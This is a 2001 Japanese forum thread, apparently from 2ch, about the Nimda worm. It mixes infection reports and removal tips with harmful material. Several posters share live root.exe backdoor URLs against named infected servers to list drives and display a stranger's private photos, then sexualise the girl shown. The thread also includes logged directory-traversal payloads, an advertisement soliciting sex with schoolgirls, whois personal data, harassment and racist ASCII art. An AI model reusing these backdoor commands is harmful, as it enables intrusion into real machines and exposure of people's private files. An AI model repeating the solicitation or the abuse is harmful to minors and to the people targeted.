お前、MSN Explorerって作ってみただけちゃうんかと。
ブラウザ通の俺から言わせてもらえば今、ブラウザ通の間での最新流行はやっぱり、
Mozilla、これだね。
MozillaにMuliZilla。これが通の入れ方。
MuliZillaってのは機能が多めに入ってる。そん代わりバグも少し多め。これ。
で、それにMozilla 用コンテキストメニュー拡張。これ最強。
しかしこれを入れると、どこにバグがあるのか分からないという危険も伴う、諸刃の剣。
素人にはお薦め出来ない。
まあお前らド素人は、Intranet Explorerでも使ってなさいってこった。

イマイチ

NindaってNanda?

そういうﾈﾀだったのか��(￣△￣；

Ninda age

>>339
なんか最近よく見るね、この文章。
元々センス無いとは思ってたけど
339はもっとセンスないな。
中卒か？

MS-DOSからdel readme.emlじゃダメなの？

Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

経験は語るってか

Nimdaが欲しくてmsn行ったらもう復旧された後だった、と（ｗ

>>344
ここの吉野屋も見てみ。
http://isweb33.infoseek.co.jp/play/liloatx/index.html

>>349

ﾜﾗﾀ

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+dir+"c:\"

丸見えやん。

また、あかねちゃん復活かｗ

意味不明の「ニンダ」よりあかねちゃんのほうがいいよ

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8150020.JPG

萌えました？

ハイ（．．=）

って、そっちより、こっちがいいっす・・。
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8190029.JPG

いや、ふぇれっとじゃなくて。

もっとエロいのないの？
パパ撮ってよﾊｧﾊｧ

>>356

>もっとエロいのないの？
>パパ撮ってよﾊｧﾊｧ

あったよ
http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8040002.JPG

>>357
既出おやじいやーん

>>358

>パパ撮ってよﾊｧﾊｧ

スマソ、パパ萌えなのかと・・・(^^;

・・・ほとんどあかねフォルダｽﾚに・・・。

まあここもニムダ感染してるし（ｗ

もうちょっと美少女だったらセキュ板のアイドルにして
半角板に宣伝にいったのに

>>362

http://3d75adaf.t-net.ne.jp/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\あかね\P8190029.JPG

この子、肩にホクロあるでしょ。>>353 とは別の子だとおもうのね。
この子>>355 の全部顔が写ってるのだったらその資格あるとおもうんだけどなぁ。

http://vil.nai.com/vil/virusSummary.asp?virus_k=99209
亜種でたみたいねぇ。
README.EXE と README.EML を PUTA!!.SCR と PUTA!!.EML に置き換えて
実行バイナリ圧縮しただけかな？

adimage.dll
advert.dll
advpack.dll
amcis.dll
amcis2.dll
amcompat.tlb
amstream.dll
anadsc.ocx
anadscb.ocx
htmdeng.exe
ipcclient.dll
msipcsv.exe
tfde.dll

ある安全保障局系のサイトにアクセスしてから、
不正アクセスが増えたのです。
変に思い調べたら、
こんなファイルを植え付けられました。
スパイウエアらしいのですがウイルスバスターは認識せず、
手動で削除しました。
CIA系のHPは危険みたいです。

>>365
つまんない。
ついでにマルチポストやめれ。

>>365
だいぶ前に広まったデマ(つーか誤解)だった気がするが…

http://www.takara-univ.ac.jp
のサーバーが何時の間にやらServer: Microsoft-IIS/5.0になっていた。
最初から何故出来なかったのだ。

>>368

久々の宝塚造形芸術大学 短期大学部情報（ｗ
こばるとCubeは借り物だったのか？（ｗ


だが・・、
IE(5以降)を起動
↓
「ファイル」-「開く」
↓
http://www.takara-univ.ac.jp/と入力
↓
「Webフォルダとして開く」にチェック
↓
OKをクリック
↓
・・・・・。

http://www.86star.co.jp/
↓
ftp://www.86star.co.jp/
↓
http://people.site.ne.jp/mirror2/2001.10.07/www.86star.co.jp/index.html
↓
・・・・。

■流出の恐れがあったMSの顧客データ
http://japan.cnet.com/News/2001/Item/011011-5.html?mn
マイクロソフトの顧客サービス用ウェブサイトが、ブラウザーさえあ
れば誰でも顧客の取引記録をはじめとする機密情報を閲覧できる状態
だった。検索データベースにセキュリティー保護をかけていなかった。

マイクロソフトの顧客サービス用ウェブサイトが、ブラウザーさえあ
れば誰でも顧客の取引記録をはじめとする機密情報を閲覧できる状態
だった。検索データベースにセキュリティー保護をかけていなかった。

流出の恐れがあったMSの顧客データ
http://japan.cnet.com/News/2001/Item/011011-5.html?mn

なぜ30分以上開けてかぶる。

ＮＩＭＤＡ以上のウイルス

★★東京都で狂牛病発生★★★
http://news.2ch.net/test/read.cgi?bbs=news&key=1002851962

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

hanngakumannse-

　 　 　 　　　　┌┬┬┬┐
　　　　―――┴┴┴┴┴―――――、
　 /. ￣￣￣//.￣￣| ||￣￣￣|||￣ |｜
　　/.　 　　∧// ∧ ∧| || 　 　 　||| 　 |｜
　[/＿＿__(ﾟ_//[ ].ﾟДﾟ,,) ||＿＿＿||| 　 |｜
　||_.　*　 ＿|_|￣￣ ∪|.|. 　 　 　 |ヽ. _|｜
　lO|o―o|O゜.|二二 京|.|都 双岡病院 ||
　| ∈口∋￣_l＿＿ｌ⌒ｌ_|＿＿＿__|_ｌ⌒ｌ_||
　　￣￣`ー'￣ 　　`ー'　 `ー'　 　`ー'
　　　　　　　　　　∧
／￣￣￣￣￣￣　￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣＼
|　>>1をお迎えに上がりました　　　　　　　 　　　　　　　　　　　　　　　　　　　　　　　　　 　　|
＼＿＿　 ＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿ ＿＿＿＿＿＿＿／
　 　　　V　　　 　　　　凸＼＿＿＿＿＿＿＿＿_／,凸、　　　　　　　　　　 ∨　　　　 ＿＿＿＿＿＿＿
　　　　　　　　　　　ノ´⌒｀ヽ三三三三三三三i三.ノ´⌒｀ヽ､　　　　　　　　　―――――――、 　 　　ヽヽ
　　　　　　　　　[二ノ´金｀ヽ二]二二二二二二i仁ノ´劵｀ヽﾆﾌ　　　　　　 /. ￣￣￣//.￣￣| ||＿＿＿＿ヽヽ
　　　　　　　　 　　,.-┴―┬┴┐鬨鬩鬨鬩鬨鬨鬩鬨　　　　　　　　　　/.　 　　∧// ∧ ∧| ||　京都市 　ヽ ヽ
　 　 　 　 　 　　／ΛΛ //　Λ｜|L匳匳||卅||匳匯||匳||　　　　　　　　[/＿＿__(ﾟ_//[ ].ﾟДﾟ,,) ||　環境局　　|　　|
　　　　　　 　／＿(ﾟдﾟ_//_ﾟДﾟ,,)| |丗卅丗卅丗卅丗卅丗　　　　　　　 ||_　　　 ＿|_|￣￣ ∪|.||￣￣￣￣￣|　　|
　　_,,,.-―''''"_,,,.-―''''"|コ￣　∪i　￣￣￣￣￣￣￣￣￣|　　　　　　　lO|――|O゜.|＿＿＿_|.||.-――――┴―|
　iﾞ(}[王i王]I()0ｺ ―― |―――=|――――――――――〕　　　　　　|_∈口∋￣_l＿＿ｌ⌒ｌ | | コ□ﾆ//ｌ⌒ｌソ
　|_∈口∋￣_l＿ｌ⌒ｌ ﾉ 　 　 　 ﾉ　　　　　　＿＿＿ｌ⌒ｌ＿ソ　　　　　　　　　　`ー'￣ 　　`ー'￣ `ー'　 　`ー
　　￣￣`ー'￣　`ー'￣￣￣￣ ￣￣￣￣`ー'　　 `ー'

>>377
ﾊｧ?

ま、Nimda騒動も一息ついたことだし、潮時かねぇ。

>>379
まだいっぱい来るけどな。
ネタ切れなのは確か。

ＭＳＮのサイトが二ムダに感染して
被害が出たのっていっだったっけ？
９／１９？９／１８？
午後１１時過ぎに見た人が感染したというのは
覚えているんだけど…。

http://help.msn.co.jp/notice.htm
18日だよ。

間違えて別のスレにも書いちゃったけど

203.116.169.71 で
ニムダが待ってます・・・

アクセスすると、WMPが起動し、ニムダが入ってきました。

オレっちが今朝ここへアクセスしたあと、ウィルススキャンかけたら
インターネット一時ファイルに入ってました。

対策ページ１
http://www.kagaku.co.jp

>>383

こっ、これは・・・（ｗ

>>384
んんん？

ftp://www.kagaku.co.jp

今、MSNのチャットが開かんがNimda関係ないかな？
asahi.comも．．．

203.116.169.71検索したら
以下の方でした

Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
(whois7.apnic.net)

inetnum: 203.116.169.64 - 203.116.169.95
netname: EDGECON-SG
descr: Edge Consultant
country: SG
admin-c: KC9-AP
tech-c: KE2-AP
notify: [email protected]
mnt-by: MAINT-AS4657-AP
changed: [email protected] 19991203
source: APNIC

person: Cheng Kong Chit
address: Cyberway Pte Ltd
address: 82, Genting Lane, News Centre
address: Singapore 349567
country: SG
phone: +65-740-1691
fax-no: +65-841-1653
e-mail: [email protected]
nic-hdl: KC9-AP
mnt-by: MAINT-AS4657
changed: [email protected] 970519
source: APNIC

person: Kenny Ng
address: StarHub Internet Pte Ltd
address: 31 Kaki Bukit Road 3
address: #05-18/20 Techlink Lobby A
address: Singapore 417818
country: SG
phone: +65-8806821
fax-no: +65-8441315
e-mail: [email protected]
nic-hdl: KE2-AP
mnt-by: MAINT-AS4657
changed: [email protected] 20000519
source: APNIC

今日、Windows2000Server入れて、ダイアルアップの設定を確認したついでに２，３調べ物をしたら
nimdaに感染してしまった。trendmicroのdosベースの駆除プログラムで潰した。
まだお盛んのようだな。早速パッチを当てよう。

>>389
今のご時世、パッチ当ててからネットに繋ぐが吉。
パッチファイル自体はネットから持ってこなくちゃいかんが。

そのパッチがあるのはM＄の鯖。。。

Nimdaって本当に感染力が強いですよね．

ところで，炭疽菌の封筒の消印は9月18日らしいですね．
Nimdaも18日頃からですね．

>>392
関連付けたいみたいだけど、関係ないと思うよ。

虎さん，どうも
関係ないなら良いです．
未知の仕掛けとかが在ると嫌だな思ったもので．（ニムダに）

ネットスケープ系のブラウザでページ見ても感染するの？
その事に関しては情報入ってこないんだけど？
当方、４．０４使用。javaとかでひっかかるかなぁ？

>>395

>ネットスケープ系のブラウザでページ見ても感染するの？

見ただけでは感染しませんが、ネットスケープ系のブラウザで感染することは可能です。

http://www.maruhati.co.jp/
改竄の上　NIMDA持ち とほほ

詳細
https://www.netsecurity.ne.jp/article/9/3017.html

コンパック３度目の改竄
バックドア放置の
http://www.apec.co.jpも紹介

今日メールに添付ファイル開いたら　感染しちった.
ノートンの体験版使ってもだめだったYO
OSはwinXP

いくらウイルススキャンしてもひっかかんないのに
少したてばＣドライブにＴＦＴＰファイルが…　(ﾟДﾟ)

>>399
Nimdaメールが送られてきたってことかにゃ？

最近ネタがすっかり減ってお迎えも来たようです（ｗ

http://www.ipa.go.jp/security/crack_report/20011005/0109.html
ＩＰＡの報告書ではnimdaやCoderedの扱いが不正アクセスにも扱われているようなんだけど
法律の定義で言う不正アクセスとは違うんだよね。
同じ名称使わずになんとかしてくれないかなー。
ワームに感染すると不正アクセスで逮捕されると勘違いさせておいた方がよいような気もするれどね。

>>402

うーん。
これを読んでいると、いわゆるハッキング（クラッキング）と、CodeRedのと、「不正アクセス」の境界があいまいになってきているようにも感じます・・。

■ワーム新時代：危険性が一段と増加
http://japan.cnet.com/News/2001/Item/011019-2.html?mn
これからのコンピューター・ワームは、ウイルスとハッカー攻撃をうま
く組み合わせることで一段と破壊力が増す可能性が高いという。感染し
た添付メールを開くという行為を介在させずに広がる『Code Red』と
『Nimda』はその先駆けで、セキュリティー会社はウイルス駆除だけを
扱っていては生き残れない。

懐かしのこのサイトが再び・・。

http://www.hyundaijapan.co.jp/

台湾政府からNimdaのパケットが飛んできたよ・・・
gov.tw

<A HREF="mailto:[email protected]"> [email protected] </A>

<A HREF="mailto:[email protected]"> [email protected] </A>

今さら？　ＣｏｄｅＲｅｄ 　Ｎｉｍｄａ
211.13.210.40
http://211.13.210.40/

株式会社サイバービジョン (CyberVision Co.,Ltd.)
CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.)
SUBA-200-C07 [サブアロケーション] 211.13.210.0

Copyleft (C) 水泥棒菊池Ｍツトム県奥様濃ゆ軍西米良し村所１偏屈ババア菊池記念館在住村ヤク場役人が水泥棒を止めません。
クソ猿しいやどけてんろ禿タコゴリラ貝市来（いちき）日通りドライバーＭツトム県＠三原名誉会長９臭ダイワ運湯５老出身白熊桜島高利貸アイス本社労再無視

文責　スッポン放送汚れ穴ウンサーチャッキー恩田

NHKでやってたよあげ

>>407
見たけどたいした内容じゃなかったsage

>>406もう少し簡便に書いてくれsage

こんなんあったが、おらよくわかんねえだ。
どうしたらいいだか？

https://www.netsecurity.ne.jp/article/1/3109.html
Windows NT4.0および2000のターミナル・サーバの脆弱性を修正するプログラムを
リリース（マイクロソフト）(2001.10.25)
　マイクロソフト株式会社は、Windows NT4.0およびWindows 2000のターミナル・サーバの
脆弱性を修正するプログラムをリリースした。これらサーバが実装する
Remote Data Protocol（RDP）は特殊な連続したデータパケットを正しく処理できないため、
無効なRDPデータを受信した場合、サーバが異常終了することがあるとのこと。再起動する
ことによりサービス再開は可能で、この脆弱性を利用してターミナル サーバ セッションの
セキュリティの侵害やサーバのデータの追加、変更、削除はできない。現在、NT4.0
日本語版向けプログラムは準備中。2000向けは日本語版がダウンロード可能。

>>410
あんた、NT 4.0 Terminal Service Edition か、2000 Server
使ってるのか？ そうでなければ関係ねえべ。

>>411
おお、んだなや。おらんなの使ってねえだ。
ういんどうづに穴っつうと心配になるだよ。
ありがとうなぁm(_ _)m

age

<A HREF="mailto:[email protected]"> [email protected] </A>

From:Getfreepizza　[email protected]
To: [email protected]
Subject:Cash in a Flash!
Date:*****
MIME-Version:1.0
Received:from [66.77.58.14] by hotmail.com (3.2) with ESMTP id MHotMail*****
From hotmail.com ***** -2500
X-RMD-Text:yes
X-Mailer:em5000
Message-ID: [email protected]

exploder5.em5000.com (pri=10)
問題あり：不正な中継を受け付けます。
(66.77.58.69)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

http://211.13.210.40/
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-051を適用するとcookieの警告が英語で表示される。

From:HotDeals [email protected]
Subject:Do you want to smell good?
Date:*****
Received: from [161.58.202.99] by hotmail.com with ESMTP id MHotMail*****
Received: (from localhost)by s0268.pm0.net (8.8.8pmg/8.8.5) id KBC12345for:include:/usr/home/
From [email protected] *****
Message-Id: [email protected]
X-Info: Message sent by Postmaster General customer with ID "HotDeals"
X-Info: Report abuse to list owner at [email protected]
X-PMG-Userid: HotDeals
X-PMG-Msgid:
X-PMG-Recipient: [email protected]

しかしね、ナンダね、ＮＩＭＤＡね。
実に鬱陶しいね。
昨日の２０時から数えて、大体６０っ回。

ま、鬱陶しいだけなんだけどね。
実に。

ここはどうかな

秘話機能付き高機能チャットルーム

http://www2.csc.ne.jp/~cym10262/

http://211.13.210.40/scripts/root.exe?/c+dir+"c:\

株式会社サイバービジョン (CyberVision Co.,Ltd.)
CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.)
SUBA-200-C07 [サブアロケーション] 211.13.210.0

211.14.241.スパムに対応しない。
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.240.0-211.14.241.0
b. [ネットワーク名] KATCH-NET
f. [組織名] 株式会社キャッチネットワーク
g. [Organization] KATCH Network Inc.
m. [運用責任者] TK998JP
n. [技術連絡担当者] YO349JP
p. [ネームサーバ] ns.katch.ne.jp
p. [ネームサーバ] ns2.katch.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 2000/09/26
[返却年月日]
[最終更新] 2001/03/28 11:50:23 (JST)
[email protected]

Hurricane Electric (NETBLK-HURRICANE-2) HURRICANE-264.71.128.0 - 64.71.191.255
NT Technology (NETBLK-HURRICANE-CE0023-1216) HURRICANE-CE0023-1216
64.71.148.40 - 64.71.148.47

To single out one record, look it up with "!xxx", where xxx is the
handle, shown in parenthesis following the name, which comes first.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.

すみません。間違えました。

Nimda再攻撃警戒age

http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-051を適用するとcookieの警告が英語で表示される。

0a0x0w0v1q1c1d0o0p0m1g0r0Z0j1k0p0v1p0q0f1v0b0x0y11
0k0Z0a230o0x0B030T03080C0A070400061B0O0F0M1H1F1A1I
1r1r1t1p41053z0l3c383u3C3s372I3S2G3P2F142D2J2B1I29
1g272C251h2Z1X2X1S2V2K2S3M2Q2a2R1L

202.224.199.35 - - [30/Oct/2001:16:47:38 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
（・・・中略・・・）
202.224.199.35 - - [30/Oct/2001:16:51:26 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.224.199.32/29
b. [ネットワーク名] JPWIN-NET
f. [組織名] マイクロソフト プロダクト ディベロップメント リミテッド
g. [Organization] Microsoft Product Development Ltd.
m. [運用責任者] TE579JP
n. [技術連絡担当者] TE579JP
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2001/06/06
[返却年月日]
[最終更新] 2001/06/06 17:53:47 (JST)
[email protected]

何故、こんな所から・・・？

メールに添付して来るタイプのNimdaに発遭遇．
今時珍しい．

Nimda.E型が流行の兆しあり。

日本医師会でも感染して騒ぎになったそうな。つーか、ウチにも
何本か感染メールが届いてるし。やだやだ。

うちのもログをみたら，Nimda.Eでした．
teireiほにゃららという見知らぬmlサーバーからでした．

思うんだけど、Nimdaﾁｪｸだけならこういうバッチで十分なのでは？
まあ、htmlには対応できないけど。

.
.
.
ECHO ■「ニムダ」が不正コピーした.emlと.nwsファイルを検索します。 >> c:\nimdalog.txt
ECHO -------------------------------- >> c:\nimdalog.txt
ECHO. >> c:\nimdalog.txt
ECHO １／７■「ニムダ」が不正コピーした.emlと.rnsファイルを検索中・・・
ECHO ※780,000〜800,000Byteのファイルが多いと感染の可能性が激高です。 >> c:\nimdalog.txt
ECHO. >> c:\nimdalog.txt
ECHO *.eml 検索中・・・
ECHO dir /s *.eml >> c:\nimdalog.txt
dir /s *.eml >> c:\nimdalog.txt
ECHO *.nws 検索中・・・
ECHO dir /s *.nws >> c:\nimdalog.txt
dir /s *.nws >> c:\nimdalog.txt
ECHO.
ECHO ---------------------------------------------------------------- >> c:\nimdalog.txt
ECHO ■「ニムダ」が不正コピーした.tmpと.exeを検索します。 >> c:\nimdalog.txt
ECHO -------------------------------- >> c:\nimdalog.txt
ECHO ２／７■「ニムダ」が不正コピーした.tmpと.exeを検索中・・・
ECHO mep****.tmpやmep****.tmp.exeなどがあれば感染の可能性が激高です。 >> c:\nimdalog.txt
ECHO. >> c:\nimdalog.txt
dir /s mep*.tm* >> c:\nimdalog.txt
.
.
.

うちのapacheサーバー(61.xxx.xxx.xx.)には、まだこんなに来襲しているよ。韓国。中国、台湾の人々よ早く何とかしてくれ！！
21/Oct/2001 2567
22/Oct/2001 3517
23/Oct/2001 3478
24/Oct/2001 3609
25/Oct/2001 3649
26/Oct/2001 3286
27/Oct/2001 2720
28/Oct/2001 2992
29/Oct/2001 3338
30/Oct/2001 4205
31/Oct/2001 2015

来襲数TOP20

www.hionkiya.co.jp 348件
61.141.gd.cn 157
61.77.140.27 112
61.158.120.130 80
61.143.250.143 80
61.166.53.49 64
61.72.150.13 64
61.78.163.198 64
ftp.jbgntop.co.kr 64
61.187.119.69 64
61.83.178.64 64
61.156.42.11 64
flkyoto194.dsnw.ne.jp 61
61.133.72.178 55
61.128.193.106 48
61.181.202.133 48
61.136.22.18 48
61.75.61.245 48
61.187.194.158 48
61.182.145.130 48

http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

From:FoundMoney [email protected]
Reply-To:Mail OP [email protected]
To: [email protected]
Subject:poochikeh3,this money could be yours
Date:*****
Received: from [209.114.218.115] by hotmail.com with ESMTP id MHotMail*****
Received: (qmail uid 0); *****
From [email protected] *****
Message-ID: [email protected]
X-Sender: optinglobal.com
X-MailID: 8769875
Errors-To: [email protected]
Complain-To: [email protected]

From: [email protected]
[email protected]
To: [email protected]
Subject:last chance to opt-in!
Date:*****
Received: from [128.121.214.236] by hotmail.com with ESMTP id MHotMail*****
Received:(from localhost)by sj1-4-17-20.iserver.com (8.8.8pmg/8.8.5) id *****for
include:/usr/home/optin2savebig/delivery/
From [email protected]
Message-Id [email protected]
X-Info: Message sent by Postmaster General customer with ID "optin2savebig"
X-Info: Report abuse to list owner at [email protected] X-PMG-Userid: optin2savebig
X-PMG-Msgid:
X-PMG-Recipient: [email protected]

ノートンアップデートage

会社のネットワークがEでダウン・・。
仕事にならねーよ・・

今度のやつは攻撃範囲が広がったようで、プライベートＩＰもサーバーアタック対象になってますね。

>>433
ルーターの下のパソコン同士が攻撃しあうって事？

　ウリナラ開発の改造Nimdaでﾁｮｯﾊﾟﾘが苦しんでいるﾆﾀﾞ
　　＿＿＿＿_　＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿／
　　　　　　　|/
　　　　　　　　　　　 ＼_　　　 _／ _／ ﾋﾞﾋﾞﾋﾞﾋﾞ
　　　　 Λ＿Λ　　　　 ＼　/　／
　　　　<丶｀∀´>　　　 ΛξΛ　　　／￣￣￣￣￣￣￣￣￣￣
　　　　（　　　　）　　　<丶゜∀゜>　＜　　ﾆｰﾋｬﾋｬﾋｬﾋｬ!!
　　　　｜ ｜　|　　　　（　　　　）　　 ＼　ﾁｮｯﾊﾟﾘのPCに感染ﾆﾑﾀﾞ!!
　　　　〈＿フ__フ　　　〈＿_ﾌ___ﾌ　　　　＼＿＿＿＿＿＿＿＿＿＿

ギャワー！！
MXで落としたエロファイル鑑定用に入れてたノー�d先生（試用版）に
初めて警告された！！
>Temporary Internet Files\Content.IE5\OPXOTAOB\search[1].htm は
>W32.Nimda.A@mm(html) ｳｨﾙｽに感染していました｡
>ﾌｧｲﾙは修復されました｡
だって…どうやらｺﾞｰｸﾞﾙで検索してたら感染したらしい。
どうせウィルスなんてうちには来ないだろうと思ってたのに…ブルブル…

>>435
差別主義者が外に出てくるな。

Nimdaの変種「W32.Nimda.E@mm」がでたそうだ。
他にB、C、Dとあるそうだが、検疫コレクション（ノートン先生）には、
Aしかないんだけど、変種の感染サイトだれか知らない？

ここのログをdat2htmlで変換しようとするとdat2htmlが落ちるのですが。

>>438
平和のための退役軍人の会
http://www.veteransforpeace.org/

どーよ。

友達のPCがニムダに感染したらしいんですが駆除しても
「名前を変えて保存」を選ぶとメモリが不足しているみたいなことが
出てきて保存が出来ないらしい。
ニムダに感染するとそんな風になったりするのでしょうか？

>>441
その友達…IEアップデートはしてる？
駆除ツールも最新版かい？

>>442
今晩携帯のメールで送ってきたので詳しくは聞いていませんが
PCにあまり詳しくないので更新はしていないと思います。
駆除ツールも最新ではないと思います。

じゃあダメだ。
何度でも感染するよ。
できればあなた自ら赴いて修繕してやって。

[email protected]
ここからＮｉｍｄａ．Ｅがきた。ＭＬサーバーと思われる。

>>444
この前IE6落としたからそれを持っていってみます。
レスありがとうございました。

>>441
間違いなく感染してる

もし本当に完全に駆除してるなら、Officeの再インストールで治るよ。
保存できないのはOffice関連でしょ？

>>448
夜に携帯のメールに来ただけで詳しく聞いていません。
明日詳しく聞いてみてofficeの再インストールをしてみるように
言ってみます。ありがとうございます。

nimdaを駆除したのですが、リブートするたびに、勝手にﾃﾞｨﾚｸﾄﾘ共有に出されてしまいます。
設定をいじってみても、直りません。

アドヴァイスください。

61.*.*.*で、急に増えた気がする。

Nimda 飛ばしてくれる人
dns.rainbow.sunflare.co.jp
pcs330.kato-m.ne.jp

>>450
クリーンインストール

最近のワームに当ったらクリーンインストールがいいんじゃないかな。

http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

http://www.optinglobal.com/scripts/root.exe?/c+dir+"c:\

http://www.pm0.net/scripts/root.exe?/c+dir+"c:\
http://www.postmastergeneral.com/scripts/root.exe?/c+dir+"c:\

>>450
再感染の疑い有り。
ちゃんと穴は塞いだ？

ところでいまさらだが、アダルトサイトって検索にわざと関係ない
キーワードをおいてるけど、readme.emlとかもキーワードにしてるね。

本題と関係ないのでsage

初心者でも簡単にニムダを駆除する方法ってありますか？
友達が会社で使っているPCがニムダに感染したらしくて、うまく駆除
出来ないみたいなのです。なにかいいものありますか?

Formatして再インストール！

（長くて申し訳ない）

自分のアドレスが from に書かれたNIMDAメールが先ほど12時頃多量に
あちこちに送られたようなのです。各社のゲートウェイでウィルスチェックに
引っかかったものや、アドレスが存在しないものが、自分に返信されてきました。
（約50通で止まったのは不幸中の幸い）

自分宛にも１通届いていまして、そのヘッダ。

Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: (qmail 40917 invoked from network);
4 Nov 2001 00:59:51 +0900
Date: 4 Nov 2001 00:59:51 +0900
Message-ID: <[email protected]>
Received: from yahoobb227098027.bbtec.net (HELO YYY) (43.227.98.27)
by smx04.hostservice.xx.jp
with SMTP;
4 Nov 2001 00:59:51 +0900

ちなみに、Yahoo!BBには、申し込んでみたことはありますが、８月にキャンセルを
して、キャンセルを受理したメールを受け取っています。
VirusBuster2001のパターン番号163で全ファイルを検索しましたが、fromに自分の
アドレスをかたって YBB から送られてきたものや、返却されてきたもの以外には
NIMDAは発見できませんでした。新しいNIMDAの変種ではなく、PE_NIMDA.A-O が
含まれた readme.exe が送りつけられてきました。

どういう事象が考えられるでしょうか？

>>458
トレンドマイクロかシマンテクで駆除ツール配布してなかった？
nimda第一波が落ち着いた後で検査ツールに続いて公開されてたよ。

こんなバカな事象（自分のPCの感染が確認できないのに、自分から
NIMDAをあちこちに送りつけている状態）なのは、自分だけ？

どこに何を言えば良いのか。43.227.98.27からメールが出ている
から、それをYahoo!BBに追いかけてもらうのが筋とは思うが、
相手は、１ヶ月もメールを放置する相手で．．．

弟のパソコンが一昨日の夕方からネットにつながらなくなって
色々調べているとニムダに感染してました。
駆除はしたんですが、相変わらずネットにつながりません。
私のｐｃとネットワークではつながっているんですが。

これって再インストールしたほうがいいんでしょうか？
どうもＷＩＮＭＸでうつされたようです。

>>460
勤務先の顧客が全く同じ現象です。（但し私が対応した
お客様はKLEZ.Aが送りつけられてますが・；・）
金曜日から同様のケースが勃発しています。

Fromを騙る振る舞いをするKLEZ.Aの亜種があるようです、
で一応クローズしてますが、NIMDAでも出ているんですね。
感染しているのは43.227.98.27なので460さんのマシンが
どうこうという話ではないと思います。
今までのウィルスは、To:にアドレス帳なり、TemporaryInter
netFilesで拾ったアドレスを入れて送信するのでまだ判りや
すかったんですが、それがFrom：に移行するとかなりたちが
悪いですよね。。
ちなみにとあるウィルスソフトのメーカーに現象を報告したん
ですが埒があきませんでした。対応がかなり遅れていると思
います。週明け位から大混乱になる可能性大です。ｳﾄｩ・・

>>464
ありがとうございます。
FROMに自分のアドレスが書いてあるので、ウィルス送付の苦情が自分に
来るわけでして、実際来ました。丁寧にお詫びするしかありませんよね。
週明け、企業などから苦情が殺到しそうだとは思っております。（悲）

>>461
駆除ツールを使ったらしいのですが、うまく駆除出来ないでいるみたい
で、Officeのファイルの保存が出来ないみたいです。
とりあえず、いくつかの駆除ツールを使ってみてって言おうと
思います。何日か前に感染したみたいなんで、もしかしたら新種でしょうか?

>>464
＞鯖サポ
企業内情報をもらすんじゃねぇｳﾞｫｹ

>468

具体名を出しているわけじゃないし。状況からOKだとおもわれるが
この程度の情報交換が問題だと思う理由は？

>>465
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=TROJ_KLEZ.A
↑一応コレ張っとく。KLEZ
アンチvirのプロセスkillする機能有るらしい。
nimdaの使うMS01-020のバグ突いてくる。メール添付に関してはnimda対策してな
いと感染しやすい。
・・・ネトワーク越しで共有ドライブにウイルスコピー置く機能もついてるらしい。
会社端末これにやられると少し厄介ね。。。。。

>>468
氏んだら？ジャペーンAさん

ｗｉｎｍｘでは感染しないとカキコ見るとなってますがｍｐｅｇ落としてたら
知らぬ間にデスクトップに知らないファイルが異常にできてしまいました。
いろいろな場所に沢山意味のわからないファイルができてしまったのでウイルスバスターを
使ってみたところＰＥ＿ＮＩＭＤＡ.Ａ−０というウイルスが4000個も・・・
原因はｍｘじゃ無いのかもしれませんが共有していたＰＣにまで感染で死にそうです。
リカバリーする際の重要点をご教授ねがえませんか。お願いします。
それにしても鬱です・・・

あーぼん。
それだけ数が多いとなると修復は無理。
素直に、FORMAT C:ですね

あ

日本最大の援助交際サイト


地元の


女子中高校生とHや３Pしたいならここ！！




http://000.zive.net/e.html
(援助交際クラブ)
//

Ｍツトム県奥様濃ゆ軍西米良し村所菊池記念館が水泥棒を止めません。
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]
http://www.optinglobal.com/cgi-bin/[email protected]

http://www.optinglobal.com/scripts/root.exe?/c+dir+"c:\
http://www.pm0.net/scripts/root.exe?/c+dir+"c:\
